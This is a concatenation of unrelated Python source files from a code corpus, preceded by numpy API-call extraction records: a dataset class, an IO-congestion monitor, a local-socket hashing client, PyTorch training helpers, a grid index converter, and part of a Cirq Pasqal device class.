((29911, 29930), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (29918, 29930), True, 'import numpy as np\n'), ((30360, 30399), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (30374, 30399), True, 'import numpy as np\n'), ((30400, 30422), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (30410, 30422), True, 'import numpy as np\n'), ((635, 650), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (643, 650), True, 'import numpy as np\n'), ((1064, 1089), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (1072, 1089), True, 'import numpy as np\n'), ((5975, 6000), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (5983, 6000), True, 'import numpy as np\n'), ((8485, 8516), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (8495, 8516), True, 'import numpy as np\n'), ((8553, 8584), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (8563, 8584), True, 'import numpy as np\n'), ((8621, 8652), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (8631, 8652), True, 'import numpy as np\n'), ((8809, 8847), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (8819, 8847), True, 'import numpy as np\n'), ((8926, 8964), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (8936, 8964), True, 'import numpy as np\n'), ((9043, 9081), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (9053, 9081), True, 'import numpy as np\n'), ((9154, 9179), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (9162, 9179), True, 'import numpy as np\n'), ((14065, 14090), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (14073, 14090), True, 'import numpy as np\n'), ((16575, 16606), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (16585, 16606), True, 'import numpy as np\n'), ((16643, 16674), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (16653, 16674), True, 'import numpy as np\n'), ((16711, 16742), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (16721, 16742), True, 'import numpy as np\n'), ((16899, 16937), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (16909, 16937), True, 'import numpy as np\n'), ((17016, 17054), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (17026, 17054), True, 'import numpy as np\n'), ((17133, 17171), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (17143, 17171), True, 'import numpy as np\n'), ((17244, 17269), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (17252, 17269), True, 'import numpy as np\n'), ((22155, 22180), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (22163, 22180), True, 'import numpy as np\n'), ((24665, 24696), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (24675, 24696), True, 'import numpy as np\n'), ((24733, 24764), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (24743, 24764), True, 'import numpy as np\n'), ((24801, 24832), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (24811, 24832), True, 'import numpy as np\n'), ((24989, 25027), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (24999, 25027), True, 'import numpy as np\n'), ((25106, 25144), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (25116, 25144), True, 'import numpy as np\n'), ((25223, 25261), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (25233, 25261), True, 'import numpy as np\n'), ((25334, 25359), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (25342, 25359), True, 'import numpy as np\n'), ((30245, 30270), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (30253, 30270), True, 'import numpy as np\n'), ((32755, 32786), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (32765, 32786), True, 'import numpy as np\n'), ((32823, 32854), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (32833, 32854), True, 'import numpy as np\n'), ((32891, 32922), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (32901, 32922), True, 'import numpy as np\n'), ((33079, 33117), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (33089, 33117), True, 'import numpy as np\n'), ((33196, 33234), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (33206, 33234), True, 'import numpy as np\n'), ((33313, 33351), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (33323, 33351), True, 'import numpy as np\n'), ((33424, 33449), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (33432, 33449), True, 'import numpy as np\n'), ((1109, 1134), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (1117, 1134), True, 'import numpy as np\n'), ((9199, 9224), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (9207, 9224), True, 'import numpy as np\n'), ((17289, 17314), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (17297, 17314), True, 'import numpy as np\n'), ((25379, 25404), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (25387, 25404), True, 'import numpy as np\n'), ((33469, 33494), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (33477, 33494), True, 'import numpy as np\n')]
import pandas as pd import numpy as np from src.si.util.util import label_gen __all__ = ['Dataset'] class Dataset: def __init__(self, X=None, Y=None, xnames: list = None, yname: str = None): """ Tabular Dataset""" if X is None: raise Exception("Trying to instanciate a DataSet without any data") self.X = X self.Y = Y self.xnames = xnames if xnames else label_gen(X.shape[1]) self.yname = yname if yname else 'Y' @classmethod def from_data(cls, filename, sep=",", labeled=True): """Creates a DataSet from a data file. :param filename: The filename :type filename: str :param sep: attributes separator, defaults to "," :type sep: str, optional :return: A DataSet object :rtype: DataSet """ data = np.genfromtxt(filename, delimiter=sep) if labeled: X = data[:, 0:-1] Y = data[:, -1] else: X = data Y = None return cls(X, Y) @classmethod def from_dataframe(cls, df, ylabel=None): """Creates a DataSet from a pandas dataframe. :param df: [description] :type df: [type] :param ylabel: [description], defaults to None :type ylabel: [type], optional :return: [description] :rtype: [type] """ if ylabel and ylabel in df.columns: X = df.loc[:, df.columns != ylabel].to_numpy() #transforma num array de numpy Y = df.loc[:, ylabel].to_numpy() # xnames = df.columns.tolist().remove(ylabel) yname = ylabel xnames = df.columns.tolist() for name in xnames: if name == yname: xnames.remove(yname) else: X = df.to_numpy() Y = None xnames = df.columns.tolist() yname = None return cls(X, Y, xnames, yname) def __len__(self): """Returns the number of data points.""" return self.X.shape[0] def hasLabel(self): """Returns True if the dataset constains labels (a dependent variable)""" return self.Y is not None def getNumFeatures(self): """Returns the number of features""" return self.X.shape[1] def getNumClasses(self): """Returns the number of label classes or 0 if the dataset has no dependent variable.""" return len(np.unique(self.Y)) if self.hasLabel() else 0 def writeDataset(self, filename, sep=","): """Saves the dataset to a file :param filename: The output file path :type filename: str :param sep: The fields separator, defaults to "," :type sep: str, optional """ fullds = np.hstack((self.X, self.Y.reshape(len(self.Y), 1))) np.savetxt(filename, fullds, delimiter=sep) def toDataframe(self): """ Converts the dataset into a pandas DataFrame""" if self.hasLabel(): df = pd.DataFrame(np.hstack((self.X, self.Y.reshape(len(self.Y), 1))), columns=self.xnames[:]+[self.yname]) #columns=np.hstack((self.xnames, self.yname))) else: df = pd.DataFrame(self.X.copy(), columns=self.xnames[:]) return df def getXy(self): return self.X, self.Y def summary(dataset, format='df'): """ Returns the statistics of a dataset(mean, std, max, min) :param dataset: A Dataset object :type dataset: si.data.Dataset :param format: Output format ('df':DataFrame, 'dict':dictionary ), defaults to 'df' :type format: str, optional """ if format not in ["df", "dict"]: raise Exception("Invalid format. Choose between 'df' and 'dict'.") if dataset.hasLabel(): data = np.hstack((dataset.X, dataset.Y.reshape(len(dataset.Y), 1))) #data = np.hstack([dataset.X, np.reshape(dataset.Y, (-1, 1))]) columns = dataset.xnames[:] + [dataset.yname] else: data = dataset.X columns = dataset.xnames[:] stats = {} if type(dataset.Y[0]) is str: for i in range(data.shape[1]-1): #ve colunas _means = np.mean(data[:, i], axis=0) _vars = np.var(data[:, i], axis=0) _maxs = np.max(data[:, i], axis=0) _mins = np.min(data[:, i], axis=0) stat = {"mean": _means, "var": _vars, "max": _maxs, "min": _mins } stats[columns[i]] = stat else: for i in range(data.shape[1]): # ve colunas _means = np.mean(data[:, i], axis=0) _vars = np.var(data[:, i], axis=0) _maxs = np.max(data[:, i], axis=0) _mins = np.min(data[:, i], axis=0) stat = {"mean": _means, "var": _vars, "max": _maxs, "min": _mins } stats[columns[i]] = stat # _means = np.mean(data, axis=0) # _vars = np.var(data, axis=0) # _maxs = np.max(data, axis=0) # _mins = np.min(data, axis=0) # stats = {} # for i in range(data.shape[1]): # stat = {"mean": _means[i], # "var": _vars[i], # "max": _maxs[i], # "min": _mins[i] # } # stats[columns[i]] = stat if format == "dict": return stats else: return pd.DataFrame(stats)
[ "src.si.util.util.label_gen", "numpy.mean", "numpy.unique", "numpy.max", "numpy.savetxt", "numpy.min", "pandas.DataFrame", "numpy.genfromtxt", "numpy.var" ]
[((878, 916), 'numpy.genfromtxt', 'np.genfromtxt', (['filename'], {'delimiter': 'sep'}), '(filename, delimiter=sep)\n', (891, 916), True, 'import numpy as np\n'), ((2885, 2928), 'numpy.savetxt', 'np.savetxt', (['filename', 'fullds'], {'delimiter': 'sep'}), '(filename, fullds, delimiter=sep)\n', (2895, 2928), True, 'import numpy as np\n'), ((5482, 5501), 'pandas.DataFrame', 'pd.DataFrame', (['stats'], {}), '(stats)\n', (5494, 5501), True, 'import pandas as pd\n'), ((446, 467), 'src.si.util.util.label_gen', 'label_gen', (['X.shape[1]'], {}), '(X.shape[1])\n', (455, 467), False, 'from src.si.util.util import label_gen\n'), ((4202, 4229), 'numpy.mean', 'np.mean', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4209, 4229), True, 'import numpy as np\n'), ((4250, 4276), 'numpy.var', 'np.var', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4256, 4276), True, 'import numpy as np\n'), ((4297, 4323), 'numpy.max', 'np.max', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4303, 4323), True, 'import numpy as np\n'), ((4344, 4370), 'numpy.min', 'np.min', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4350, 4370), True, 'import numpy as np\n'), ((4652, 4679), 'numpy.mean', 'np.mean', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4659, 4679), True, 'import numpy as np\n'), ((4700, 4726), 'numpy.var', 'np.var', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4706, 4726), True, 'import numpy as np\n'), ((4747, 4773), 'numpy.max', 'np.max', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4753, 4773), True, 'import numpy as np\n'), ((4794, 4820), 'numpy.min', 'np.min', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4800, 4820), True, 'import numpy as np\n'), ((2497, 2514), 'numpy.unique', 'np.unique', (['self.Y'], {}), '(self.Y)\n', (2506, 2514), True, 'import numpy as np\n')]
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # # Copyright (c) 2016 Wind River Systems, Inc. # # SPDX-License-Identifier: Apache-2.0 # import logging import os from io_monitor.constants import DOMAIN from io_monitor.utils.data_window import DataCollectionWindow LOG = logging.getLogger(DOMAIN) class DeviceDataCollector(object): # Moving average windows MA_WINDOW_SMA = 0 MA_WINDOW_MED = 1 MA_WINDOW_LAR = 2 # Device status STATUS_NORMAL = "N" STATUS_BUILDING = "B" STATUS_CONGESTED = "L" # Data tracked DATA_IOPS = "iops" DATA_AWAIT = "await" def __init__(self, device_node, data_elements, size_sma, size_med, size_lar): self.node = device_node if os.path.exists('/sys/block/' + self.node + '/dm/name'): self.name = open('/sys/block/' + self.node + '/dm/name', 'r').read().rstrip() else: self.name = self.node self.data_dict = {} self.data_caps = {self.DATA_AWAIT: -1, self.DATA_IOPS: -1} self.timestamp = None self.congestion_status = self.STATUS_NORMAL self.congestion_await_minimal_spike = -1 self.congestion_await_sustained = -1 for element in data_elements: self.data_dict.update({element: [ DataCollectionWindow(size_sma, stuck_data_override=True), DataCollectionWindow(size_med, stuck_data_override=True), DataCollectionWindow(size_lar, stuck_data_override=True)]}) def update_congestion_status(self): # Bail if threshold is not set if self.congestion_await_sustained == -1: return ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA) ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED) ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR) # Set the congestion status based on await moving average if self.congestion_status is self.STATUS_NORMAL: if ma_sma > self.congestion_await_sustained: self.congestion_status = self.STATUS_BUILDING if self.congestion_status is self.STATUS_BUILDING: if ma_lar > self.congestion_await_sustained: self.congestion_status = self.STATUS_CONGESTED LOG.warn("Node %s (%s) is experiencing high await times." % (self.node, self.name)) elif ma_sma < self.congestion_await_sustained: self.congestion_status = self.STATUS_NORMAL if self.congestion_status is self.STATUS_CONGESTED: if ma_med < self.congestion_await_sustained: self.congestion_status = self.STATUS_BUILDING def update_data(self, ts, element, value): self.timestamp = ts # LOG.debug("%s: e = %s, v= %f" % (self.node, element, value)) for w in [self.MA_WINDOW_SMA, self.MA_WINDOW_MED, self.MA_WINDOW_LAR]: self.data_dict[element][w].update(value, self.data_caps[element]) def get_latest(self, element): if element not in self.data_dict: LOG.error("Error: invalid element requested = %s" % element) return 0 return self.data_dict[element][self.MA_WINDOW_SMA].get_latest() def get_average(self, element, window): if window not in [self.MA_WINDOW_SMA, self.MA_WINDOW_MED, self.MA_WINDOW_LAR]: LOG.error("WindowError: invalid window requested = %s" % window) return 0 if element not in self.data_dict: LOG.error("Error: invalid element requested = %s" % element) return 0 return self.data_dict[element][window].get_average() def is_data_stale(self, ts): return not (ts == self.timestamp) def get_congestion_status(self, debug=False): if debug: ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA) ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED) ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR) LOG.debug("%s [ %6.2f %6.2f %6.2f ] %d" % (self.node, ma_sma, ma_med, ma_lar, self.congestion_await_sustained)) return self.congestion_status def set_data_caps(self, element, cap): if element in self.data_caps: self.data_caps[element] = cap def set_congestion_thresholds(self, await_minimal_spike, await_sustained_congestion): self.congestion_await_minimal_spike = await_minimal_spike self.congestion_await_sustained = await_sustained_congestion def get_element_windows_avg_list(self, element): return [self.get_average(element, self.MA_WINDOW_SMA), self.get_average(element, self.MA_WINDOW_MED), self.get_average(element, self.MA_WINDOW_LAR)] def get_element_windows_avg_string(self, element): return "%s [ %9.2f, %9.2f, %9.2f ]" % ( element, self.get_average(element, self.MA_WINDOW_SMA), self.get_average(element, self.MA_WINDOW_MED), self.get_average(element, self.MA_WINDOW_LAR))
[ "logging.getLogger", "os.path.exists", "io_monitor.utils.data_window.DataCollectionWindow" ]
[((270, 295), 'logging.getLogger', 'logging.getLogger', (['DOMAIN'], {}), '(DOMAIN)\n', (287, 295), False, 'import logging\n'), ((739, 793), 'os.path.exists', 'os.path.exists', (["('/sys/block/' + self.node + '/dm/name')"], {}), "('/sys/block/' + self.node + '/dm/name')\n", (753, 793), False, 'import os\n'), ((1336, 1392), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_sma'], {'stuck_data_override': '(True)'}), '(size_sma, stuck_data_override=True)\n', (1356, 1392), False, 'from io_monitor.utils.data_window import DataCollectionWindow\n'), ((1410, 1466), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_med'], {'stuck_data_override': '(True)'}), '(size_med, stuck_data_override=True)\n', (1430, 1466), False, 'from io_monitor.utils.data_window import DataCollectionWindow\n'), ((1484, 1540), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_lar'], {'stuck_data_override': '(True)'}), '(size_lar, stuck_data_override=True)\n', (1504, 1540), False, 'from io_monitor.utils.data_window import DataCollectionWindow\n')]
from net_common import * import struct import sys def getDirHashOpts(withNames=False, ignoreThumbsFiles=True, ignoreUnixHiddenFiles=True, ignoreEmptyDirs=True): return bytearray([((1 if withNames else 0) + (2 if ignoreThumbsFiles else 0) + (4 if ignoreUnixHiddenFiles else 0) + (8 if ignoreEmptyDirs else 0))]) if __name__ == "__main__": sock = get_connected_local_socket() path = encodeString('/dev/shm/exampleDir') # path = encodeString('/dev/null') sock.sendall(bytearray(b'\x0A')) # HASH request # sock.sendall(bytearray(b'\x01')) # choose MD5 algorithm sock.sendall(bytearray(b'\x06')) # choose SHA3-224 algorithm sock.sendall(getDirHashOpts(withNames=True,ignoreUnixHiddenFiles=False)) # send dirHashOpts byte (unused for regular files) sock.sendall(struct.pack("@H", len(path))) # len of path as unsigned short sock.sendall(path) resp = sock.recv(1) # response first byte: \x00 OK or \xFF ERROR if resp != b'\x00': print("Error byte received, errno is:", struct.unpack("@i", sock.recv(4))[0]) sys.exit(0) # print(toHex(sock.recv(16))) # 128 bit (16 byte) md5 digest size print(toHex(sock.recv(28))) # 224 bit (28 byte) sha3-224 digest size sock.close()
[ "sys.exit" ]
[((1201, 1212), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1209, 1212), False, 'import sys\n')]
'''Some helper functions for PyTorch, including: - progress_bar: progress bar mimic xlua.progress. - set_lr : set the learning rate - clip_gradient : clip gradient ''' import os import sys import time import math import torch import torch.nn as nn import torch.nn.init as init from torch.autograd import Function #获取控制台行、列数 if sys.platform == 'win32': term_width = 80 else: print('###', os.popen('stty size', 'r').read()) _, term_width = os.popen('stty size', 'r').read().split() term_width = int(term_width) TOTAL_BAR_LENGTH = 30. last_time = time.time() begin_time = last_time #[==>........ 19/225 ...........] | Loss: 1.961 | Acc: 22.000% (537/2432) def progress_bar(current, total, msg=None): global last_time, begin_time if current == 0: begin_time = time.time() # Reset for new bar. cur_len = int(TOTAL_BAR_LENGTH*current/total) rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1 sys.stdout.write(' [') for i in range(cur_len): sys.stdout.write('=') sys.stdout.write('>') for i in range(rest_len): sys.stdout.write('.') sys.stdout.write(']') cur_time = time.time() step_time = cur_time - last_time last_time = cur_time tot_time = cur_time - begin_time L = [] if msg: L.append(' | ' + msg) msg = ''.join(L) sys.stdout.write(msg) for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3): sys.stdout.write(' ') # Go back to the center of the bar. for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2): sys.stdout.write('\b') sys.stdout.write(' %d/%d ' % (current+1, total)) if current < total-1: sys.stdout.write('\r') else: sys.stdout.write('\n') sys.stdout.flush() def set_lr(optimizer, lr): for group in optimizer.param_groups: group['lr'] = lr def clip_gradient(optimizer, grad_clip): for group in optimizer.param_groups: #print(group['params']) for param in group['params']: param.grad.data.clamp_(-grad_clip, grad_clip)
[ "sys.stdout.flush", "os.popen", "time.time", "sys.stdout.write" ]
[((587, 598), 'time.time', 'time.time', ([], {}), '()\n', (596, 598), False, 'import time\n'), ((971, 993), 'sys.stdout.write', 'sys.stdout.write', (['""" ["""'], {}), "(' [')\n", (987, 993), False, 'import sys\n'), ((1060, 1081), 'sys.stdout.write', 'sys.stdout.write', (['""">"""'], {}), "('>')\n", (1076, 1081), False, 'import sys\n'), ((1149, 1170), 'sys.stdout.write', 'sys.stdout.write', (['"""]"""'], {}), "(']')\n", (1165, 1170), False, 'import sys\n'), ((1189, 1200), 'time.time', 'time.time', ([], {}), '()\n', (1198, 1200), False, 'import time\n'), ((1390, 1411), 'sys.stdout.write', 'sys.stdout.write', (['msg'], {}), '(msg)\n', (1406, 1411), False, 'import sys\n'), ((1648, 1698), 'sys.stdout.write', 'sys.stdout.write', (["(' %d/%d ' % (current + 1, total))"], {}), "(' %d/%d ' % (current + 1, total))\n", (1664, 1698), False, 'import sys\n'), ((1806, 1824), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1822, 1824), False, 'import sys\n'), ((825, 836), 'time.time', 'time.time', ([], {}), '()\n', (834, 836), False, 'import time\n'), ((1033, 1054), 'sys.stdout.write', 'sys.stdout.write', (['"""="""'], {}), "('=')\n", (1049, 1054), False, 'import sys\n'), ((1122, 1143), 'sys.stdout.write', 'sys.stdout.write', (['"""."""'], {}), "('.')\n", (1138, 1143), False, 'import sys\n'), ((1487, 1508), 'sys.stdout.write', 'sys.stdout.write', (['""" """'], {}), "(' ')\n", (1503, 1508), False, 'import sys\n'), ((1620, 1644), 'sys.stdout.write', 'sys.stdout.write', (['"""\x08"""'], {}), "('\\x08')\n", (1636, 1644), False, 'import sys\n'), ((1735, 1757), 'sys.stdout.write', 'sys.stdout.write', (["'\\r'"], {}), "('\\r')\n", (1751, 1757), False, 'import sys\n'), ((1778, 1800), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (1794, 1800), False, 'import sys\n'), ((422, 448), 'os.popen', 'os.popen', (['"""stty size"""', '"""r"""'], {}), "('stty size', 'r')\n", (430, 448), False, 'import os\n'), ((475, 501), 'os.popen', 'os.popen', (['"""stty size"""', '"""r"""'], {}), "('stty size', 'r')\n", (483, 501), False, 'import os\n')]
from __future__ import absolute_import, division, print_function import logging import sys logging.basicConfig( stream=sys.stdout, level=logging.DEBUG, format='%(asctime)s %(name)s-%(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S') import numpy as np import utils logger = logging.getLogger("indexconverter") class IndexConverter(object): def __init__(self, ndim, ngrid): self.ndim = ndim self.ngrid = ngrid self._modulus = [(ngrid - 1) ** (ndim - j - 1) for j in range(ndim)] self._zerodim = np.zeros((self.ndim,)) self.nbins = int(np.rint((ngrid - 1) ** ndim)) def convert_to_vector(self, grid): if grid.shape[0] != self.ngrid - 1: raise Exception("Wrong dimension of grid. Expect length fo %s got %s" % (self.ngrid - 1, grid.shape[0])) vector = np.empty((self.nbins,)) for bin_idx in range(self.nbins): vector[bin_idx] = grid[tuple(self.convert_to_grid_idx(bin_idx))] return vector def convert_to_grid(self, vector): grid_shape = tuple(np.zeros(self.ndim).astype(int) + (self.ngrid - 1)) if len(vector.shape) > 1: grids = np.empty((len(vector),) + grid_shape) for idx, v in enumerate(vector): grids[idx] = self.convert_to_grid(v) return grids else: grid = np.zeros(grid_shape) for idx in range(len(vector)): grid[tuple(self.convert_to_grid_idx(idx))] = vector[idx] return grid def convert_to_grid_idx(self, bin_idx): if bin_idx >= self.nbins or bin_idx < 0: print(self.nbins, self.ndim, self.nbins ** self.ndim) raise Exception("Invalid index %s. You are probably outside the grid..." % bin_idx) grid_idx = ((self._zerodim + bin_idx) / self._modulus) % (self.ngrid - 1) return grid_idx.astype(int) def convert_to_bin_idx(self, grid_idx): bin_idx = utils.rint(np.sum(grid_idx * self._modulus)) if bin_idx >= self.nbins or bin_idx < 0: raise Exception( "Invalid bin index %s. You are probably outside the grid. Size:%s" % (bin_idx, self.nbins)) return bin_idx
[ "logging.basicConfig", "logging.getLogger", "numpy.sum", "numpy.zeros", "numpy.empty", "numpy.rint" ]
[((93, 249), 'logging.basicConfig', 'logging.basicConfig', ([], {'stream': 'sys.stdout', 'level': 'logging.DEBUG', 'format': '"""%(asctime)s %(name)s-%(levelname)s: %(message)s"""', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "(stream=sys.stdout, level=logging.DEBUG, format=\n '%(asctime)s %(name)s-%(levelname)s: %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S')\n", (112, 249), False, 'import logging\n'), ((298, 333), 'logging.getLogger', 'logging.getLogger', (['"""indexconverter"""'], {}), "('indexconverter')\n", (315, 333), False, 'import logging\n'), ((556, 578), 'numpy.zeros', 'np.zeros', (['(self.ndim,)'], {}), '((self.ndim,))\n', (564, 578), True, 'import numpy as np\n'), ((852, 875), 'numpy.empty', 'np.empty', (['(self.nbins,)'], {}), '((self.nbins,))\n', (860, 875), True, 'import numpy as np\n'), ((604, 632), 'numpy.rint', 'np.rint', (['((ngrid - 1) ** ndim)'], {}), '((ngrid - 1) ** ndim)\n', (611, 632), True, 'import numpy as np\n'), ((1384, 1404), 'numpy.zeros', 'np.zeros', (['grid_shape'], {}), '(grid_shape)\n', (1392, 1404), True, 'import numpy as np\n'), ((1993, 2025), 'numpy.sum', 'np.sum', (['(grid_idx * self._modulus)'], {}), '(grid_idx * self._modulus)\n', (1999, 2025), True, 'import numpy as np\n'), ((1084, 1103), 'numpy.zeros', 'np.zeros', (['self.ndim'], {}), '(self.ndim)\n', (1092, 1103), True, 'import numpy as np\n')]
# Copyright 2020 The Cirq Developers # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import FrozenSet, Callable, List, Sequence, Any, Union, Dict import numpy as np import networkx as nx import cirq from cirq import _compat, GridQubit, LineQubit from cirq.ops import NamedQubit from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset @cirq.value.value_equality class PasqalDevice(cirq.devices.Device): """A generic Pasqal device. The most general of Pasqal devices, enforcing only restrictions expected to be shared by all future devices. Serves as the parent class of all Pasqal devices, but can also be used on its own for hosting a nearly unconstrained device. When used as a circuit's device, the qubits have to be of the type cirq.NamedQubit and assumed to be all connected, the idea behind it being that after submission, all optimization and transpilation necessary for its execution on the specified device are handled internally by Pasqal. """ def __init__(self, qubits: Sequence[cirq.Qid]) -> None: """Initializes a device with some qubits. Args: qubits (NamedQubit): Qubits on the device, exclusively unrelated to a physical position. Raises: TypeError: If the wrong qubit type is provided. ValueError: If the number of qubits is greater than the devices maximum. """ if len(qubits) > 0: q_type = type(qubits[0]) for q in qubits: if not isinstance(q, self.supported_qubit_type): raise TypeError( 'Unsupported qubit type: {!r}. This device ' 'supports qubit types: {}'.format(q, self.supported_qubit_type) ) if not type(q) is q_type: raise TypeError("All qubits must be of same type.") if len(qubits) > self.maximum_qubit_number: raise ValueError( 'Too many qubits. {} accepts at most {} ' 'qubits.'.format(type(self), self.maximum_qubit_number) ) self.gateset = PasqalGateset() self.qubits = qubits self._metadata = cirq.DeviceMetadata( qubits, nx.from_edgelist([(a, b) for a in qubits for b in qubits if a != b]) ) # pylint: enable=missing-raises-doc @property def supported_qubit_type(self): return (NamedQubit,) @property def maximum_qubit_number(self): return 100 @property def metadata(self): return self._metadata @_compat.deprecated(fix='Use metadata.qubit_set() if applicable.', deadline='v0.15') def qubit_set(self) -> FrozenSet[cirq.Qid]: return frozenset(self.qubits) def qubit_list(self): return [qubit for qubit in self.qubits] def is_pasqal_device_op(self, op: cirq.Operation) -> bool: if not isinstance(op, cirq.Operation): raise ValueError('Got unknown operation:', op) return op in self.gateset def validate_operation(self, operation: cirq.Operation): """Raises an error if the given operation is invalid on this device. Args: operation: The operation to validate. Raises: ValueError: If the operation is not valid. NotImplementedError: If the operation is a measurement with an invert mask. """ if not isinstance(operation, cirq.GateOperation): raise ValueError("Unsupported operation") if not self.is_pasqal_device_op(operation): raise ValueError(f'{operation.gate!r} is not a supported gate') for qub in operation.qubits: if not isinstance(qub, self.supported_qubit_type): raise ValueError( '{} is not a valid qubit for gate {!r}. This ' 'device accepts gates on qubits of type: ' '{}'.format(qub, operation.gate, self.supported_qubit_type) ) if qub not in self.metadata.qubit_set: raise ValueError(f'{qub} is not part of the device.') if isinstance(operation.gate, cirq.MeasurementGate): 